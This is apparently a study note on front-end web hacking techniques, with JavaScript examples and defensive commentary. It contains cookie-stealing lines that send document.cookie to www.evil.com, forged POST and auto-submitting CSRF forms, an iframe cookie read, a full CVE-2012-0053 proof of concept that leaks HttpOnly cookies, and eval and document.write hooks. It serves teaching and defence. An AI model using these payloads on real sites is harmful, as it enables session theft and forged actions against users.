Web前端黑客技术揭秘 笔记2

时间:2022-08-29 21:18:39

一.模拟用户发起浏览器请求

        1.1 GET方式,实际上就是一个URL

// Two GET-based ways, from the notes, of sending document.cookie to another
// host: an image whose src carries the data, and a full navigation.
// Defender's view: both lines can only carry what document.cookie exposes, so
// marking session cookies HttpOnly removes them from the payload; a Content
// Security Policy img-src limits where the image request may go; and the
// navigation variant is visible to the user as the page leaving.  In proxy or
// CSP-report logs this shows up as an outbound request with cookie-shaped
// query data.
new Image().src="http://www.evil.com/steal.php"+escape(document.cookie)
location.href="http://www.evil.com/steal.php"+escape(document.cookie)

        1.2 POST请求

              同步发送请求

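// Create one XMLHttpRequest object up front and keep it in the script-level
// variable `xhr`, which request() below reuses for every call.
// Falls back to the legacy ActiveX object on old IE; evaluates to false when
// neither is available (including outside a browser, where `window` is absent).
// Fixes: the original wrote `New XMLHttpRequest()`, which is a syntax error,
// and assigned to an undeclared global.
var xhr = (function () {
    var obj = false;
    var hasWindow = typeof window !== 'undefined';
    if (hasWindow && window.XMLHttpRequest) {
        obj = new XMLHttpRequest();
    } else if (hasWindow && window.ActiveXObject) {
        try {
            obj = new window.ActiveXObject('Microsoft.XMLHTTP');
        } catch (e) {
            // ActiveX exists but the MSXML component cannot be created: stay false.
        }
    }
    return obj;
}());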
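// Send a synchronous request through the shared `xhr` object and return the
// response body as text.
//   method       - HTTP method string, e.g. "GET" or "POST"
//   src          - request URL
//   argv         - body handed to send() (null/undefined for GET)
//   content_type - value of the Content-Type header; only set for POST
// The third argument of open() is false, i.e. synchronous: the page blocks
// until the response arrives, and synchronous XHR on the main thread is
// deprecated in current browsers.
var request = function (method, src, argv, content_type) {
    xhr.open(method, src, false); // synchronous
    if (method === 'POST') {
        xhr.setRequestHeader('Content-Type', content_type);
    }
    xhr.send(argv);
    return xhr.responseText;
};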
// default (URL-encoded) form
// Example from the notes: a cross-origin POST of two fixed fields as
// application/x-www-form-urlencoded through the request() helper above.
// Defender's view: a form-encoded POST like this is a CORS "simple request",
// so the browser sends it (only the response is withheld); an endpoint must
// not rely on the browser refusing to send it.  CSRF tokens, SameSite cookies
// and server-side Origin/Referer checks are the usual mitigations.
// Note: the next snippet reuses the name attack_a, so this version is
// overwritten when both are loaded in the same script.
attack_a=function(){
    var src="http://www.evil.com/steal.php";
    var argv_0="&name1=value1&name2=value2";
    request("POST",src,argv_0,"application/x-www-form-urlencoded");// default (URL-encoded) form
}

// file-upload form
// Same POST as above, but the body is assembled by hand in multipart/form-data
// layout: each part is a delimiter line, a Content-Disposition line, a blank
// line and the value, and the body ends with the delimiter followed by "--".
// NOTE(review): the last `+=` targets `argv` instead of `argv_0`, so as
// written the closing delimiter is never appended to the body that is sent.
// Defender's view: the content type does not change the risk; the same
// mitigations apply (CSRF token, SameSite cookies, Origin/Referer check).
attack_a=function(){
    var src="http://www.evil.com/steal.php";
    var name1="value1";
    var name2="value2";
    var argv_0="\r\n";// the first line of the HTTP message is blank
    argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name1\"\r\n\r\n"
    argv_0+=(name1+"\r\n");
    argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name2\"\r\n\r\n"
    argv_0+=(name2+"\r\n");
    argv+="---------------------7964f8dddeb95fc5--\r\n";// the final two dashes -- mark the end of the HTTP message
    request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
}

        Form表单自提交,常用于CSRF攻击中

// Create an empty POST form, attach it to the page body and hand it back so
// the caller can add inputs, set action and submit it.
function new_form() {
    var form = document.createElement("form");
    form.method = "post";
    document.body.appendChild(form);
    return form;
}
// Append a text input named eName with value eValue to eForm and return it.
// The input is kept out of sight: engines where `document.all` is falsy
// (which includes current browsers, where it is deliberately so) use
// display:none; the legacy document.all branch leaves it displayed at 0x0.
function create_elements(eForm, eName, eValue) {
    var input = document.createElement("input");
    eForm.appendChild(input);
    input.type = 'text';
    input.name = eName;
    var legacyEngine = Boolean(document.all);
    if (legacyEngine) {
        input.style.display = 'block';
        input.style.width = '0px';
        input.style.height = '0px';
    } else {
        input.style.display = 'none';
    }
    input.value = eValue;
    return input;
}
// Demo from the notes: build a form with two fields and submit it as soon as
// the script runs.  This is the auto-submitting-form pattern the section
// attributes to CSRF: the browser attaches the destination site's cookies to
// the POST even though the page that created the form is a different origin.
// Mitigations on the receiving side: an unpredictable per-session CSRF token,
// SameSite=Lax/Strict on the session cookie, and rejecting requests whose
// Origin/Referer is cross-site.
var _f=new_form();// create a form object
create_elements(_f,"name1","value1");// create the form's input objects
create_elements(_f,"name2","value2");
_f.action="http://www.evil.com/steal1.php";// form submission URL
_f.submit();// submit

二.Cookie机制

2.1子域Cookie机制,不同子域可以共享父域的Cookie

2.2路径Cookie机制,可以跨iframe跨路径读Cookie

// Demo from the notes: load a same-origin page under a different path in an
// iframe and read its document.cookie once it has loaded.  The point of the
// section: the cookie Path attribute is not a security boundary.  The
// same-origin policy is scoped to scheme/host/port only, so script on
// http://a.foo.com/ can reach a frame of http://a.foo.com/admin/ and read the
// cookies scoped to that path.  Do not rely on Path for isolation: HttpOnly
// keeps a cookie out of document.cookie, and a sensitive area that must be
// isolated from the rest of the site belongs on its own origin.
// NOTE(review): `ducument` on the appendChild line is a typo for `document`,
// so this snippet throws as written; `d` is also an undeclared global.
xc=function(src){
    var o=document.createElement("iframe");// iframe pointing at a same-origin target
    o.src=src;
    ducument.getElementsByTagName("body")[0].appendChild(o);
    o.onload=function(){// once the iframe has loaded
        d=o.contentDocument||o.contentWindow.document;// get its document object
        alert(d.cookie);// read the cookies
    };
}('http://a.foo.com/admin/index.php');
<?php
// Server side of the cookie examples.  setcookie's positional arguments are
// name, value, expires, path, domain, secure, httponly; both calls pass 0 for
// secure, so these cookies are also sent over plain http://.
setcookie("test",1,time()+3600,"","",0);// set an ordinary cookie
setcookie("test_http",1,time()+3600,"","",0,1);// last argument is the HttpOnly flag: 0 = off, 1 = on, default 0
?>

(1)php的phpinfo()信息会导致HttpOnly Cookie泄漏

(2)Django应用调试信息

(3)CVE-2012-0053 错误暴露HttpOnly Cookie

// Most browsers limit cookies to 4k characters, so we need multiple
// PoC for CVE-2012-0053 as reproduced in the notes.  With `good` falsy (the
// call in makeRequest passes nothing) it sets ten 819-character "xssN"
// cookies so the next request's Cookie header exceeds the server's
// LimitRequestFieldSize; with `good` truthy it expires the same ten cookies.
// Defender's view: the weakness being exercised is the server echoing the
// offending request header into its 400 page, which puts HttpOnly cookies
// where page script can read them.  Keep error pages from reflecting raw
// request data, run a patched Apache release, and treat HttpOnly as defence in
// depth rather than a guarantee.
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {// clear the junk cookies
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {// add the junk cookies
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
 
// Second half of the CVE-2012-0053 PoC: plant the junk cookies, request "/"
// and, when the server answers 400, scrape the echoed Cookie header out of
// the <pre> block of the error page.
function makeRequest() {
setCookies();
 
// readystatechange handler: runs on every state change but only acts once the
// response is complete (readyState 4) with status 400.
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
// NOTE(review): match() returns null when the page has no <pre> block, so the
// `content.length` test below throws instead of skipping the parse.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
// Drop the xssN padding cookies, then split the remainder on ';'
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
 
// Start the PoC as soon as the script loads.
makeRequest();
Apache HTTP Server 2.2.x 多个版本没有严格限制HTTP 请求头信息,HTTP 请求头信息超过LimitRequestFieldSize长度时,服务器返回400,并将出错的请求头内容输出

2.3 Secure Cookie机制

// Overwriting a Secure cookie from page script.  The lesson of the section:
// Secure only keeps the cookie off plaintext connections; it does not by
// itself stop a cookie of the same name from being set, so a session cookie
// can be replaced with an attacker-chosen value (a session-fixation style
// risk).  Current browsers refuse to set Secure cookies from an insecure
// origin, a cookie marked HttpOnly cannot be replaced through document.cookie
// at all, and the __Host- prefix pins Path=/ and forbids Domain, which
// narrows where a same-named cookie can come from.
document.cookie="test_secure=hijack;path=/;secure;"// path and domain must match, otherwise it is treated as a different cookie

三.JavaScript函数劫持

// Function hijacking, example 1: replace the global eval with a wrapper that
// shows its argument and then delegates to the saved original.  The same
// hook pattern is used defensively (instrumenting what a page evaluates) and
// by attackers.  Two properties worth knowing: calling the original through
// the alias _eval is an *indirect* eval, so the code runs in global scope
// rather than the caller's, and the wrapper discards _eval's return value.
// Assigning to `eval` is a SyntaxError in strict-mode code and ES modules,
// so this only works in a classic sloppy-mode script.
var _eval=eval;
eval=function(x){
if(typeof(x)=='undefined') {return;}
alert(x);
_eval(x);
}
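// Function hijacking, example 2: wrap document.write so that a call with no
// argument is a no-op and everything else is forwarded to the original, which
// is bound to document so its `this` stays correct.
// The wrapper lives in hookDocumentWrite so it can be applied to any
// document-like object; _write keeps the bound original, as in the notes.
// Fix: the notes spelled the guard's string 'underfined', so the check could
// never match and document.write() wrote the text "undefined".
function hookDocumentWrite(doc) {
    var original = doc.write.bind(doc);
    doc.write = function (x) {
        if (typeof x === 'undefined') { return; }
        original(x);
    };
    return original;
}
// Install on the real document when one exists; otherwise do nothing.
var _write = typeof document !== 'undefined' ? hookDocumentWrite(document) : undefined;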

// Function hijacking, example 3: same wrapper as above, but the original is
// kept unbound and invoked with call(document, x) so document.write still
// sees document as its receiver.
var _write = document.write;
document.write = function (x) {
    var argumentMissing = typeof x === 'undefined';
    if (argumentMissing) {
        return;
    }
    _write.call(document, x);
};

// Demo call: with one of the wrappers above installed, the string is passed
// on to the saved original document.write.
document.write("<script>alert(1)</script>");